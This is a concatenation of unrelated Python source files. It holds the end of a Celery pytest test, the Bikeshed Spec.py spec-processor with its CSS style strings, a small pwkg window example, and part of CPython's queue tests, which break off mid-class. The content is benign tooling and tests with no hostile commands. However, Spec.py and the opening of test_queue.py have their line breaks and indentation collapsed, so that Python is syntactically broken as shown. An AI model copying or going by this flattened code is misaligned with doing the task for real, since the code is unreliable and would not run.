    t.daemon = True
    t.start()

    with pytest.raises(Exception):
        # Celery 4.1 raises a gibberish exception
        res.wait()

    event = events.read_event()
    exception, = event["exception"]["values"]
    assert exception["type"] == "ZeroDivisionError"

    events.read_flush()

    # if this is nonempty, the worker never really forked
    assert not runs
Spec.py
import glob import json import os import sys from collections import defaultdict from datetime import datetime from functools import partial as curry from . import ( biblio, boilerplate, caniuse, conditional, config, constants, datablocks, dfns, extensions, fingerprinting, func, h, headings, highlight, idl, includes, inlineTags, InputSource, lint, markdown, mdnspeclinks, messages as m, metadata, refs, retrieve, shorthands, unsortedJunk as u, wpt, ) class Spec: def __init__( self, inputFilename, debug=False, token=None, lineNumbers=False, fileRequester=None, testing=False, ): catchArgparseBug(inputFilename) self.valid = False self.lineNumbers = lineNumbers if lineNumbers: # line-numbers are too hacky, so force this to be a dry run constants.dryRun = True if inputFilename is None: inputFilename = findImplicitInputFile() if inputFilename is None: # still m.die( "No input file specified, and no *.bs or *.src.html files found in current directory.\nPlease specify an input file, or use - to pipe from STDIN." 
) return self.inputSource = InputSource.InputSource(inputFilename, chroot=constants.chroot) self.transitiveDependencies = set() self.debug = debug self.token = token self.testing = testing if fileRequester is None: self.dataFile = retrieve.defaultRequester else: self.dataFile = fileRequester self.md = None self.mdBaseline = None self.mdDocument = None self.mdCommandLine = None self.mdDefaults = None self.mdOverridingDefaults = None self.lines = [] self.document = None self.html = None self.head = None self.body = None self.fillContainers = None self.valid = self.initializeState() def initializeState(self): self.normativeRefs = {} self.informativeRefs = {} self.refs = refs.ReferenceManager(fileRequester=self.dataFile, testing=self.testing) self.externalRefsUsed = defaultdict(lambda: defaultdict(dict)) self.md = None self.mdBaseline = metadata.MetadataManager() self.mdDocument = None self.mdCommandLine = metadata.MetadataManager() self.mdDefaults = None self.mdOverridingDefaults = None self.biblios = {} self.typeExpansions = {} self.macros = defaultdict(lambda x: "???") self.canIUse = {} self.mdnSpecLinks = {} self.widl = idl.getParser() self.testSuites = json.loads(self.dataFile.fetch("test-suites.json", str=True)) self.languages = json.loads(self.dataFile.fetch("languages.json", str=True)) self.extraStyles = defaultdict(str) self.extraStyles["style-colors"] = styleColors self.extraStyles["style-darkmode"] = styleDarkMode self.extraStyles["style-md-lists"] = styleMdLists self.extraStyles["style-autolinks"] = styleAutolinks self.extraStyles["style-selflinks"] = styleSelflinks self.extraStyles["style-counters"] = styleCounters self.extraStyles["style-issues"] = styleIssues self.extraScripts = defaultdict(str) try: inputContent = self.inputSource.read() self.lines = inputContent.lines if inputContent.date is not None: self.mdBaseline.addParsedData("Date", inputContent.date) except FileNotFoundError: m.die(f"Couldn't find the input file at the specified location 
'{self.inputSource}'.") return False except OSError: m.die(f"Couldn't open the input file '{self.inputSource}'.") return False return True def recordDependencies(self, *inputSources): self.transitiveDependencies.update(inputSources) def preprocess(self): self.transitiveDependencies.clear() self.assembleDocument() self.processDocument() def assembleDocument(self): # Textual hacks u.stripBOM(self) if self.lineNumbers: self.lines = u.hackyLineNumbers(self.lines) self.lines = markdown.stripComments(self.lines) self.recordDependencies(self.inputSource) # Extract and process metadata self.lines, self.mdDocument = metadata.parse(lines=self.lines) # First load the metadata sources from 'local' data self.md = metadata.join(self.mdBaseline, self.mdDocument, self.mdCommandLine) # Using that to determine the Group and Status, load the correct defaults.include boilerplate self.mdDefaults = metadata.fromJson( data=retrieve.retrieveBoilerplateFile(self, "defaults", error=True), source="defaults", ) self.md = metadata.join(self.mdBaseline, self.mdDefaults, self.mdDocument, self.mdCommandLine) # Using all of that, load up the text macros so I can sub them into the computed-metadata file. self.md.fillTextMacros(self.macros, doc=self) jsonEscapedMacros = {k: json.dumps(v)[1:-1] for k, v in self.macros.items()} computedMdText = h.replaceMacros( retrieve.retrieveBoilerplateFile(self, "computed-metadata", error=True), macros=jsonEscapedMacros, ) self.mdOverridingDefaults = metadata.fromJson(data=computedMdText, source="computed-metadata") self.md = metadata.join( self.mdBaseline, self.mdDefaults, self.mdOverridingDefaults, self.mdDocument, self.mdCommandLine, ) # Finally, compute the "implicit" things. self.md.computeImplicitMetadata(doc=self) # And compute macros again, in case the preceding steps changed them. 
self.md.fillTextMacros(self.macros, doc=self) self.md.validate() extensions.load(self) # Initialize things self.refs.initializeRefs(self) self.refs.initializeBiblio() # Deal with further <pre> blocks, and markdown self.lines = datablocks.transformDataBlocks(self, self.lines) self.lines = markdown.parse( self.lines, self.md.indent, opaqueElements=self.md.opaqueElements, blockElements=self.md.blockElements, ) self.refs.setSpecData(self.md) # Convert to a single string of html now, for convenience. self.html = "".join(line.text for line in self.lines) boilerplate.addHeaderFooter(self) self.html = self.fixText(self.html) # Build the document self.document = h.parseDocument(self.html) self.head = h.find("head", self) self.body = h.find("body", self) u.correctFrontMatter(self) includes.processInclusions(self) metadata.parseDoc(self) def processDocument(self): # Fill in and clean up a bunch of data conditional.processConditionals(self) self.fillContainers = u.locateFillContainers(self) lint.exampleIDs(self) wpt.processWptElements(self) boilerplate.addBikeshedVersion(self) boilerplate.addCanonicalURL(self) boilerplate.addFavicon(self) boilerplate.addSpecVersion(self) boilerplate.addStatusSection(self) boilerplate.addLogo(self) boilerplate.addCopyright(self) boilerplate.addSpecMetadataSection(self) boilerplate.addAbstract(self) boilerplate.addExpiryNotice(self) boilerplate.addObsoletionNotice(self) boilerplate.addAtRisk(self) u.addNoteHeaders(self) boilerplate.removeUnwantedBoilerplate(self) shorthands.run(self) inlineTags.processTags(self) u.canonicalizeShortcuts(self) u.addImplicitAlgorithms(self) u.fixManualDefTables(self) headings.processHeadings(self) u.checkVarHygiene(self) u.processIssuesAndExamples(self) idl.markupIDL(self) u.inlineRemoteIssues(self) u.addImageSize(self) # Handle all the links u.processBiblioLinks(self) u.processDfns(self) idl.processIDL(self) dfns.annotateDfns(self) u.formatArgumentdefTables(self) u.formatElementdefTables(self) 
u.processAutolinks(self) biblio.dedupBiblioReferences(self) u.verifyUsageOfAllLocalBiblios(self) caniuse.addCanIUsePanels(self) boilerplate.addIndexSection(self) boilerplate.addExplicitIndexes(self) boilerplate.addStyles(self) boilerplate.addReferencesSection(self) boilerplate.addPropertyIndex(self) boilerplate.addIDLSection(self) boilerplate.addIssuesSection(self) boilerplate.addCustomBoilerplate(self) headings.processHeadings(self, "all") # again boilerplate.removeUnwantedBoilerplate(self) boilerplate.addTOCSection(self) u.addSelfLinks(self) u.processAutolinks(self) boilerplate.addAnnotations(self) boilerplate.removeUnwantedBoilerplate(self) # Add MDN panels after all IDs/anchors have been added mdnspeclinks.addMdnPanels(self) highlight.addSyntaxHighlighting(self) boilerplate.addBikeshedBoilerplate(self) fingerprinting.addTrackingVector(self) u.fixIntraDocumentReferences(self) u.fixInterDocumentReferences(self) u.removeMultipleLinks(self) u.forceCrossorigin(self) lint.brokenLinks(self) lint.accidental2119(self) lint.missingExposed(self) lint.requiredIDs(self) lint.unusedInternalDfns(self) # Any final HTML cleanups u.cleanupHTML(self) if self.md.prepTR: # Don't try and override the W3C's icon. for el in h.findAll("[rel ~= 'icon']", self): h.removeNode(el) # Make sure the W3C stylesheet is after all other styles. for el in h.findAll("link", self): if el.get("href").startswith("https://www.w3.org/StyleSheets/TR"): h.appendChild(h.find("head", self), el) # Ensure that all W3C links are https. 
for el in h.findAll("a", self): href = el.get("href", "") if href.startswith("http://www.w3.org") or href.startswith("http://lists.w3.org"): el.set("href", "https" + href[4:]) text = el.text or "" if text.startswith("http://www.w3.org") or text.startswith("http://lists.w3.org"): el.text = "https" + text[4:] # Loaded from .include files extensions.BSPrepTR(self) # pylint: disable=no-member return self def serialize(self): try: rendered = h.Serializer(self.md.opaqueElements, self.md.blockElements).serialize(self.document) except Exception as e: m.die(str(e)) return rendered = u.finalHackyCleanup(rendered) return rendered def fixMissingOutputFilename(self, outputFilename): if outputFilename is None: # More sensible defaults! if not isinstance(self.inputSource, InputSource.FileInputSource): outputFilename = "-" elif self.inputSource.sourceName.endswith(".bs"): outputFilename = self.inputSource.sourceName[0:-3] + ".html" elif self.inputSource.sourceName.endswith(".src.html"): outputFilename = self.inputSource.sourceName[0:-9] + ".html" else: outputFilename = "-" return outputFilename def finish(self, outputFilename=None, newline=None): catchArgparseBug(outputFilename) self.printResultMessage() outputFilename = self.fixMissingOutputFilename(outputFilename) rendered = self.serialize() if not constants.dryRun: try: if outputFilename == "-": sys.stdout.write(rendered) else: with open(outputFilename, "w", encoding="utf-8", newline=newline) as f: f.write(rendered) except Exception as e: m.die(f"Something prevented me from saving the output document to {outputFilename}:\n{e}") def printResultMessage(self): # If I reach this point, I've succeeded, but maybe with reservations. 
fatals = m.messageCounts["fatal"] links = m.messageCounts["linkerror"] warnings = m.messageCounts["warning"] if self.lineNumbers: m.warn("Because --line-numbers was used, no output was saved.") if fatals: m.success("Successfully generated, but fatal errors were suppressed") return if links: m.success(f"Successfully generated, with {links} linking errors") return if warnings: m.success("Successfully generated, with warnings") return def watch(self, outputFilename, port=None, localhost=False): import time outputFilename = self.fixMissingOutputFilename(outputFilename) if self.inputSource.mtime() is None: m.die(f"Watch mode doesn't support {self.inputSource}") if outputFilename == "-": m.die("Watch mode doesn't support streaming to STDOUT.") return if port: # Serve the folder on an HTTP server import http.server import socketserver import threading class SilentServer(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): pass socketserver.TCPServer.allow_reuse_address = True server = socketserver.TCPServer(("localhost" if localhost else "", port), SilentServer) print(f"Serving at port {port}") thread = threading.Thread(target=server.serve_forever) thread.daemon = True thread.start() else: server = None mdCommandLine = self.mdCommandLine try: self.preprocess() self.finish(outputFilename) lastInputModified = {dep: dep.mtime() for dep in self.transitiveDependencies} printDone() try: while True: # Comparing mtimes with "!=" handles when a file starts or # stops existing, and it's fine to rebuild if an mtime # somehow gets older. if any(input.mtime() != lastModified for input, lastModified in lastInputModified.items()): m.resetSeenMessages() m.p("\nSource file modified. 
Rebuilding...") self.initializeState() self.mdCommandLine = mdCommandLine self.preprocess() self.finish(outputFilename) lastInputModified = {dep: dep.mtime() for dep in self.transitiveDependencies} printDone() time.sleep(1) except KeyboardInterrupt: m.p("Exiting~") if server: server.shutdown() thread.join() sys.exit(0) except Exception as e: m.die(f"Something went wrong while watching the file:\n{e}") def fixText(self, text, moreMacros=None): # Do several textual replacements that need to happen *before* the document is parsed as h. # If markdown shorthands are on, remove all `foo`s while processing, # so their contents don't accidentally trigger other stuff. # Also handle markdown escapes. if moreMacros is None: moreMacros = {} if "markdown" in self.md.markupShorthands: textFunctor = u.MarkdownCodeSpans(text) else: textFunctor = func.Functor(text) macros = dict(self.macros, **moreMacros) textFunctor = textFunctor.map(curry(h.replaceMacros, macros=macros)) textFunctor = textFunctor.map(h.fixTypography) if "css" in self.md.markupShorthands: textFunctor = textFunctor.map(h.replaceAwkwardCSSShorthands) return textFunctor.extract() def printTargets(self): m.p("Exported terms:") for el in h.findAll("[data-export]", self): for term in config.linkTextsFromElement(el): m.p(" " + term) m.p("Unexported terms:") for el in h.findAll("[data-noexport]", self): for term in config.linkTextsFromElement(el): m.p(" " + term) def isOpaqueElement(self, el): if el.tag in self.md.opaqueElements: return True if el.get("data-opaque") is not None: return True return False def printDone(): contents = f"Finished at {datetime.now().strftime('%H:%M:%S %b-%d-%Y')}" contentLen = len(contents) + 2 if not constants.asciiOnly: m.p(f"╭{'─'*contentLen}╮") m.p(f"│ {contents} │") m.p(f"╰{'─'*contentLen}╯") m.p("") else: m.p(f"/{'-'*contentLen}\\") m.p(f"| {contents} |") m.p(f"\\{'-'*contentLen}/") m.p("") def findImplicitInputFile(): """ Find what input file the user *probably* wants to use, by scanning 
the current folder. In preference order: 1. index.bs 2. Overview.bs 3. the first file with a .bs extension 4. the first file with a .src.html extension """ if os.path.isfile("index.bs"): return "index.bs" if os.path.isfile("Overview.bs"): return "Overview.bs" allBs = glob.glob("*.bs") if allBs: return allBs[0] allHtml = glob.glob("*.src.html") if allHtml: return allHtml[0] return None def catchArgparseBug(string): # Argparse has had a long-standing bug # https://bugs.python.org/issue22433 # about spaces in the values of unknown optional arguments # (even when the space is in a quoted string!). # I can't fix this without doing a lot of work myself, # but I *can* discover when it has been tripped, # as the input or output filename will look like # a command-line flag, very unlikely on its own. if isinstance(string, str) and string.startswith("--") and "=" in string: m.die( "You're hitting a bug with Python's argparse library. Please specify both the input and output filenames manually, and move all command-line flags with spaces in their values to after those arguments.\nSee <https://tabatkins.github.io/bikeshed/#md-issues> for details." 
) return False return True styleColors = """ /* Any --*-text not paired with a --*-bg is assumed to have a transparent bg */ :root { color-scheme: light dark; --text: black; --bg: white; --unofficial-watermark: url(https://www.w3.org/StyleSheets/TR/2016/logos/UD-watermark); --logo-bg: #1a5e9a; --logo-active-bg: #c00; --logo-text: white; --tocnav-normal-text: #707070; --tocnav-normal-bg: var(--bg); --tocnav-hover-text: var(--tocnav-normal-text); --tocnav-hover-bg: #f8f8f8; --tocnav-active-text: #c00; --tocnav-active-bg: var(--tocnav-normal-bg); --tocsidebar-text: var(--text); --tocsidebar-bg: #f7f8f9; --tocsidebar-shadow: rgba(0,0,0,.1); --tocsidebar-heading-text: hsla(203,20%,40%,.7); --toclink-text: var(--text); --toclink-underline: #3980b5; --toclink-visited-text: var(--toclink-text); --toclink-visited-underline: #054572; --heading-text: #005a9c; --hr-text: var(--text); --algo-border: #def; --del-text: red; --del-bg: transparent; --ins-text: #080; --ins-bg: transparent; --a-normal-text: #034575; --a-normal-underline: #bbb; --a-visited-text: var(--a-normal-text); --a-visited-underline: #707070; --a-hover-bg: rgba(75%, 75%, 75%, .25); --a-active-text: #c00; --a-active-underline: #c00; --blockquote-border: silver; --blockquote-bg: transparent; --blockquote-text: currentcolor; --issue-border: #e05252; --issue-bg: #fbe9e9; --issue-text: var(--text); --issueheading-text: #831616; --example-border: #e0cb52; --example-bg: #fcfaee; --example-text: var(--text); --exampleheading-text: #574b0f; --note-border: #52e052; --note-bg: #e9fbe9; --note-text: var(--text); --noteheading-text: hsl(120, 70%, 30%); --notesummary-underline: silver; --assertion-border: #aaa; --assertion-bg: #eee; --assertion-text: black; --advisement-border: orange; --advisement-bg: #fec; --advisement-text: var(--text); --advisementheading-text: #b35f00; --warning-border: red; --warning-bg: hsla(40,100%,50%,0.95); --warning-text: var(--text); --amendment-border: #330099; --amendment-bg: #F5F0FF; 
--amendment-text: var(--text); --amendmentheading-text: #220066; --def-border: #8ccbf2; --def-bg: #def; --def-text: var(--text); --defrow-border: #bbd7e9; --datacell-border: silver; --indexinfo-text: #707070; --indextable-hover-text: black; --indextable-hover-bg: #f7f8f9; --outdatedspec-bg: rgba(0, 0, 0, .5); --outdatedspec-text: black; --outdated-bg: maroon; --outdated-text: white; --outdated-shadow: red; --editedrec-bg: darkorange; }""" styleDarkMode = """ @media (prefers-color-scheme: dark) { :root { --text: #ddd; --bg: black; --unofficial-watermark: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='400' height='400'%3E%3Cg fill='%23100808' transform='translate(200 200) rotate(-45) translate(-200 -200)' stroke='%23100808' stroke-width='3'%3E%3Ctext x='50%25' y='220' style='font: bold 70px sans-serif; text-anchor: middle; letter-spacing: 6px;'%3EUNOFFICIAL%3C/text%3E%3Ctext x='50%25' y='305' style='font: bold 70px sans-serif; text-anchor: middle; letter-spacing: 6px;'%3EDRAFT%3C/text%3E%3C/g%3E%3C/svg%3E"); --logo-bg: #1a5e9a; --logo-active-bg: #c00; --logo-text: white; --tocnav-normal-text: #999; --tocnav-normal-bg: var(--bg); --tocnav-hover-text: var(--tocnav-normal-text); --tocnav-hover-bg: #080808; --tocnav-active-text: #f44; --tocnav-active-bg: var(--tocnav-normal-bg); --tocsidebar-text: var(--text); --tocsidebar-bg: #080808; --tocsidebar-shadow: rgba(255,255,255,.1); --tocsidebar-heading-text: hsla(203,20%,40%,.7); --toclink-text: var(--text); --toclink-underline: #6af; --toclink-visited-text: var(--toclink-text); --toclink-visited-underline: #054572; --heading-text: #8af; --hr-text: var(--text); --algo-border: #456; --del-text: #f44; --del-bg: transparent; --ins-text: #4a4; --ins-bg: transparent; --a-normal-text: #6af; --a-normal-underline: #555; --a-visited-text: var(--a-normal-text); --a-visited-underline: var(--a-normal-underline); --a-hover-bg: rgba(25%, 25%, 25%, .2); --a-active-text: #f44; --a-active-underline: 
var(--a-active-text); --borderedblock-bg: rgba(255, 255, 255, .05); --blockquote-border: silver; --blockquote-bg: var(--borderedblock-bg); --blockquote-text: currentcolor; --issue-border: #e05252; --issue-bg: var(--borderedblock-bg); --issue-text: var(--text); --issueheading-text: hsl(0deg, 70%, 70%); --example-border: hsl(50deg, 90%, 60%); --example-bg: var(--borderedblock-bg); --example-text: var(--text); --exampleheading-text: hsl(50deg, 70%, 70%); --note-border: hsl(120deg, 100%, 35%); --note-bg: var(--borderedblock-bg); --note-text: var(--text); --noteheading-text: hsl(120, 70%, 70%); --notesummary-underline: silver; --assertion-border: #444; --assertion-bg: var(--borderedblock-bg); --assertion-text: var(--text); --advisement-border: orange; --advisement-bg: #222218; --advisement-text: var(--text); --advisementheading-text: #f84; --warning-border: red; --warning-bg: hsla(40,100%,20%,0.95); --warning-text: var(--text); --amendment-border: #330099; --amendment-bg: #080010; --amendment-text: var(--text); --amendmentheading-text: #cc00ff; --def-border: #8ccbf2; --def-bg: #080818; --def-text: var(--text); --defrow-border: #136; --datacell-border: silver; --indexinfo-text: #aaa; --indextable-hover-text: var(--text); --indextable-hover-bg: #181818; --outdatedspec-bg: rgba(255, 255, 255, .5); --outdatedspec-text: black; --outdated-bg: maroon; --outdated-text: white; --outdated-shadow: red; --editedrec-bg: darkorange; } /* In case a transparent-bg image doesn't expect to be on a dark bg, which is quite common in practice... */ img { background: white; } }""" styleMdLists = """ /* This is a weird hack for me not yet following the commonmark spec regarding paragraph and lists. 
*/ [data-md] > :first-child { margin-top: 0; } [data-md] > :last-child { margin-bottom: 0; }""" styleAutolinks = """ .css.css, .property.property, .descriptor.descriptor { color: var(--a-normal-text); font-size: inherit; font-family: inherit; } .css::before, .property::before, .descriptor::before { content: "‘"; } .css::after, .property::after, .descriptor::after { content: "’"; } .property, .descriptor { /* Don't wrap property and descriptor names */ white-space: nowrap; } .type { /* CSS value <type> */ font-style: italic; } pre .property::before, pre .property::after { content: ""; } [data-link-type="property"]::before, [data-link-type="propdesc"]::before, [data-link-type="descriptor"]::before, [data-link-type="value"]::before, [data-link-type="function"]::before, [data-link-type="at-rule"]::before, [data-link-type="selector"]::before, [data-link-type="maybe"]::before { content: "‘"; } [data-link-type="property"]::after, [data-link-type="propdesc"]::after, [data-link-type="descriptor"]::after, [data-link-type="value"]::after, [data-link-type="function"]::after, [data-link-type="at-rule"]::after, [data-link-type="selector"]::after, [data-link-type="maybe"]::after { content: "’"; } [data-link-type].production::before, [data-link-type].production::after, .prod [data-link-type]::before, .prod [data-link-type]::after { content: ""; } [data-link-type=element], [data-link-type=element-attr] { font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace; font-size: .9em; } [data-link-type=element]::before { content: "<" } [data-link-type=element]::after { content: ">" } [data-link-type=biblio] { white-space: pre; }""" styleSelflinks = """ :root { --selflink-text: white; --selflink-bg: gray; --selflink-hover-text: black; } .heading, .issue, .note, .example, li, dt { position: relative; } a.self-link { position: absolute; top: 0; left: calc(-1 * (3.5rem - 26px)); width: calc(3.5rem - 26px); height: 2em; text-align: center; border: none; transition: opacity .2s; opacity: .5; 
} a.self-link:hover { opacity: 1; } .heading > a.self-link { font-size: 83%; } li > a.self-link { left: calc(-1 * (3.5rem - 26px) - 2em); } dfn > a.self-link { top: auto; left: auto; opacity: 0; width: 1.5em; height: 1.5em; background: var(--selflink-bg); color: var(--selflink-text); font-style: normal; transition: opacity .2s, background-color .2s, color .2s; } dfn:hover > a.self-link { opacity: 1; } dfn > a.self-link:hover { color: var(--selflink-hover-text); } a.self-link::before { content: "¶"; } .heading > a.self-link::before { content: "§"; } dfn > a.self-link::before { content: "#"; } """ styleDarkMode += """ @media (prefers-color-scheme: dark) { :root { --selflink-text: black; --selflink-bg: silver; --selflink-hover-text: white; } } """ styleCounters = """ body { counter-reset: example figure issue; } .issue { counter-increment: issue; } .issue:not(.no-marker)::before { content: "Issue " counter(issue); } .example { counter-increment: example; } .example:not(.no-marker)::before { content: "Example " counter(example); } .invalid.example:not(.no-marker)::before, .illegal.example:not(.no-marker)::before { content: "Invalid Example" counter(example); } figcaption { counter-increment: figure; } figcaption:not(.no-marker)::before { content: "Figure " counter(figure) " "; }""" styleIssues = """ a[href].issue-return { float: right; float: inline-end; color: var(--issueheading-text); font-weight: bold; text-decoration: none; } """
example.py
#!/usr/bin/env python
"""Minimal PWKG example: open a window, load a page, and exchange JS events."""
import sys
import time

# Allow running the example without installing the package.
# NOTE(review): path hack — assumes the pwkg package lives one directory
# up from where this script is run; confirm against the repo layout.
sys.path.append('..')
import pwkg


def setupElectron(index_path, on_event):
    """Create a debug PWKG window, load *index_path*, and register
    *on_event* as the GUI-event callback.  Returns the window object."""
    w = pwkg.Window(100, 100, "PWKG Window", debug=True)
    w.load(index_path)
    w.on_gui_event += on_event
    return w


def sleep(x):
    """Block the current thread for *x* seconds (thin wrapper over
    time.sleep, kept for callers that import this module)."""
    time.sleep(x)


def on_js_event(msg):
    """Print an incoming JS event.

    Assumes *msg* is a dict-like object with a 'testdict' key — TODO
    confirm against the pwkg event payload.
    """
    print(msg)
    print(msg['testdict'])


# TODO: this blocks the main thread
def on_update(w):
    """Periodic update callback: log a line and push some JS into the page."""
    print("yo")
    line = "hi"  # sys.stdin.readline() would block the loop; use a constant
    print(line)
    w.exec_js('console.log("hi")')


def main():
    """Entry point: build the window and run its event loop (1000 ms ticks)."""
    w = setupElectron('index.html', on_js_event)
    w.run(on_update, 1000)


# Guard the entry point so importing this module (e.g. for its helpers)
# no longer launches the GUI as an import-time side effect; running the
# file as a script behaves exactly as before.
if __name__ == "__main__":
    main()
test_queue.py
# Some simple queue module tests, plus some failure conditions # to ensure the Queue locks remain stable. import itertools import random import threading import time import unittest import weakref from test import support py_queue = support.import_fresh_module('queue', blocked=['_queue']) c_queue = support.import_fresh_module('queue', fresh=['_queue']) need_c_queue = unittest.skipUnless(c_queue, "No _queue module found") QUEUE_SIZE = 5 def qfull(q): return q.maxsize > 0 and q.qsize() == q.maxsize # A thread to run a function that unclogs a blocked Queue. class _TriggerThread(threading.Thread): def __init__(self, fn, args): self.fn = fn self.args = args self.startedEvent = threading.Event() threading.Thread.__init__(self) def run(self): # The sleep isn't necessary, but is intended to give the blocking # function in the main thread a chance at actually blocking before # we unclog it. But if the sleep is longer than the timeout-based # tests wait in their blocking functions, those tests will fail. # So we give them much longer timeout values compared to the # sleep here (I aimed at 10 seconds for blocking functions -- # they should never actually wait that long - they should make # progress as soon as we call self.fn()). time.sleep(0.1) self.startedEvent.set() self.fn(*self.args) # Execute a function that blocks, and in a separate thread, a function that # triggers the release. Returns the result of the blocking function. Caution: # block_func must guarantee to block until trigger_func is called, and # trigger_func must guarantee to change queue state so that block_func can make # enough progress to return. In particular, a block_func that just raises an # exception regardless of whether trigger_func is called will lead to # timing-dependent sporadic failures, and one of those went rarely seen but # undiagnosed for years. Now block_func must be unexceptional. If block_func # is supposed to raise an exception, call do_exceptional_blocking_test() # instead. 
class BlockingTestMixin:
    """Helpers that pair a blocking queue call with a delayed trigger thread."""

    def do_blocking_test(self, block_func, block_args, trigger_func,
                         trigger_args):
        # Run block_func in this thread while trigger_func fires from a
        # _TriggerThread after a short delay; fail if block_func did not block.
        thread = _TriggerThread(trigger_func, trigger_args)
        thread.start()
        try:
            self.result = block_func(*block_args)
            # If block_func returned before our thread made the call, we failed!
            if not thread.startedEvent.is_set():
                self.fail("blocking function %r appeared not to block" %
                          block_func)
            return self.result
        finally:
            support.join_thread(thread, 10)  # make sure the thread terminates

    # Call this instead if block_func is supposed to raise an exception.
    def do_exceptional_blocking_test(self,block_func, block_args, trigger_func,
                                     trigger_args, expected_exception_class):
        thread = _TriggerThread(trigger_func, trigger_args)
        thread.start()
        try:
            try:
                block_func(*block_args)
            except expected_exception_class:
                raise
            else:
                self.fail("expected exception of kind %r" %
                          expected_exception_class)
        finally:
            support.join_thread(thread, 10)  # make sure the thread terminates
            if not thread.startedEvent.is_set():
                self.fail("trigger thread ended but event never set")


class BaseQueueTestMixin(BlockingTestMixin):
    """Shared tests for Queue/LifoQueue/PriorityQueue; subclasses set
    self.type2test (the queue class) and self.queue (the queue module)."""

    def setUp(self):
        # cum accumulates worker sums under cumlock in queue_join_test().
        self.cum = 0
        self.cumlock = threading.Lock()

    def basic_queue_test(self, q):
        # Exercise put/get ordering, full/empty detection, and the
        # blocking/timeout variants of put() and get() on an empty queue q.
        if q.qsize():
            raise RuntimeError("Call this function with an empty queue")
        self.assertTrue(q.empty())
        self.assertFalse(q.full())
        # I guess we better check things actually queue correctly a little :)
        q.put(111)
        q.put(333)
        q.put(222)
        # Expected retrieval order depends on the queue discipline under test.
        target_order = dict(Queue = [111, 333, 222],
                            LifoQueue = [222, 333, 111],
                            PriorityQueue = [111, 222, 333])
        actual_order = [q.get(), q.get(), q.get()]
        self.assertEqual(actual_order, target_order[q.__class__.__name__],
                         "Didn't seem to queue the correct data!")
        for i in range(QUEUE_SIZE-1):
            q.put(i)
            self.assertTrue(q.qsize(), "Queue should not be empty")
        self.assertTrue(not qfull(q), "Queue should not be full")
        last = 2 * QUEUE_SIZE
        full = 3 * 2 * QUEUE_SIZE
        q.put(last)
        self.assertTrue(qfull(q), "Queue should be full")
        self.assertFalse(q.empty())
        self.assertTrue(q.full())
        try:
            q.put(full, block=0)
            self.fail("Didn't appear to block with a full queue")
        except self.queue.Full:
            pass
        try:
            q.put(full, timeout=0.01)
            self.fail("Didn't appear to time-out with a full queue")
        except self.queue.Full:
            pass
        # Test a blocking put
        self.do_blocking_test(q.put, (full,), q.get, ())
        self.do_blocking_test(q.put, (full, True, 10), q.get, ())
        # Empty it
        for i in range(QUEUE_SIZE):
            q.get()
        self.assertTrue(not q.qsize(), "Queue should be empty")
        try:
            q.get(block=0)
            self.fail("Didn't appear to block with an empty queue")
        except self.queue.Empty:
            pass
        try:
            q.get(timeout=0.01)
            self.fail("Didn't appear to time-out with an empty queue")
        except self.queue.Empty:
            pass
        # Test a blocking get
        self.do_blocking_test(q.get, (), q.put, ('empty',))
        self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))

    def worker(self, q):
        # Consumer used by queue_join_test(): sums items into self.cum,
        # exits on a negative sentinel, and task_done()s every item.
        while True:
            x = q.get()
            if x < 0:
                q.task_done()
                return
            with self.cumlock:
                self.cum += x
            q.task_done()

    def queue_join_test(self, q):
        # Verify that q.join() blocks until every queued task is done.
        self.cum = 0
        threads = []
        for i in (0,1):
            thread = threading.Thread(target=self.worker, args=(q,))
            thread.start()
            threads.append(thread)
        for i in range(100):
            q.put(i)
        q.join()
        self.assertEqual(self.cum, sum(range(100)),
                         "q.join() did not block until all tasks were done")
        for i in (0,1):
            q.put(-1)         # instruct the threads to close
        q.join()                # verify that you can join twice
        for thread in threads:
            thread.join()

    def test_queue_task_done(self):
        # Test to make sure a queue task completed successfully.
        q = self.type2test()
        try:
            q.task_done()
        except ValueError:
            pass
        else:
            self.fail("Did not detect task count going negative")

    def test_queue_join(self):
        # Test that a queue join()s successfully, and before anything else
        # (done twice for insurance).
        q = self.type2test()
        self.queue_join_test(q)
        self.queue_join_test(q)
        try:
            q.task_done()
        except ValueError:
            pass
        else:
            self.fail("Did not detect task count going negative")

    def test_basic(self):
        # Do it a couple of times on the same queue.
        # Done twice to make sure works with same instance reused.
        q = self.type2test(QUEUE_SIZE)
        self.basic_queue_test(q)
        self.basic_queue_test(q)

    def test_negative_timeout_raises_exception(self):
        q = self.type2test(QUEUE_SIZE)
        with self.assertRaises(ValueError):
            q.put(1, timeout=-1)
        with self.assertRaises(ValueError):
            q.get(1, timeout=-1)

    def test_nowait(self):
        q = self.type2test(QUEUE_SIZE)
        for i in range(QUEUE_SIZE):
            q.put_nowait(1)
        with self.assertRaises(self.queue.Full):
            q.put_nowait(1)
        for i in range(QUEUE_SIZE):
            q.get_nowait()
        with self.assertRaises(self.queue.Empty):
            q.get_nowait()

    def test_shrinking_queue(self):
        # issue 10110
        q = self.type2test(3)
        q.put(1)
        q.put(2)
        q.put(3)
        with self.assertRaises(self.queue.Full):
            q.put_nowait(4)
        self.assertEqual(q.qsize(), 3)
        q.maxsize = 2                       # shrink the queue
        with self.assertRaises(self.queue.Full):
            q.put_nowait(4)


class QueueTest(BaseQueueTestMixin):

    def setUp(self):
        self.type2test = self.queue.Queue
        super().setUp()

class PyQueueTest(QueueTest, unittest.TestCase):
    queue = py_queue


@need_c_queue
class CQueueTest(QueueTest, unittest.TestCase):
    queue = c_queue


class LifoQueueTest(BaseQueueTestMixin):

    def setUp(self):
        self.type2test = self.queue.LifoQueue
        super().setUp()


class PyLifoQueueTest(LifoQueueTest, unittest.TestCase):
    queue = py_queue


@need_c_queue
class CLifoQueueTest(LifoQueueTest, unittest.TestCase):
    queue = c_queue


class PriorityQueueTest(BaseQueueTestMixin):

    def setUp(self):
        self.type2test = self.queue.PriorityQueue
        super().setUp()


class PyPriorityQueueTest(PriorityQueueTest, unittest.TestCase):
    queue = py_queue


@need_c_queue
class CPriorityQueueTest(PriorityQueueTest, unittest.TestCase):
    queue = c_queue


# A Queue subclass that can provoke failure at a moment's notice :)
class FailingQueueException(Exception): pass


class FailingQueueTest(BlockingTestMixin):
    """Tests that a Queue stays consistent when _put/_get raise mid-operation."""

    def setUp(self):

        Queue = self.queue.Queue

        class FailingQueue(Queue):
            # Set fail_next_put / fail_next_get to make the next internal
            # _put/_get raise FailingQueueException exactly once.
